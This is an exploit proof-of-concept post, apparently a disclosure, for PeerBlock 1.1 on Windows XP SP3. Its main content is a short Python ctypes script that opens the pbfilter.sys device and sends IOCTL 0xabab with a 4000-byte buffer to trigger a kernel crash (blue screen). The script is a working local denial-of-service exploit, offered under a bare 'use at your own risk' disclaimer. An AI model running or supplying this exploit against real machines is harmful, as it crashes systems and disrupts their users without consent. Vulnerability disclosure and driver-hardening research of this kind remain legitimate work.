======================================================================================================
PeerBlock 1.1 BSOD
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on:
Microsoft Windows XP Professional
5.1.2600 Service Pack 3 Build 2600
X86-based PC
Info:
PoC released as is, I have no time at the moment for further investigations
- -----------------------------------------------------------------------
FILE INFO: (http://www.peerblock.com/)
- -----------------------------------------------------------------------
File: C:\Program Files\PeerBlock\pbfilter.sys
MD5 hash: 2f6e885c432927a186c2e352c8a1cbf4
==============================================================================================================================
==============================================================================================================================
Proof of concept:
from ctypes import *
kernel32 = windll.kernel32
Psapi = windll.Psapi
if __name__ == '__main__':
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2
SYM_NAME = "\\\\.\\pbfilter"
dwReturn = c_ulong()
out_buff = "A" * 4000
in_buff = ("")
handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None)
dev_ioct = kernel32.DeviceIoControl(handle, 0xabab, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None)
===========================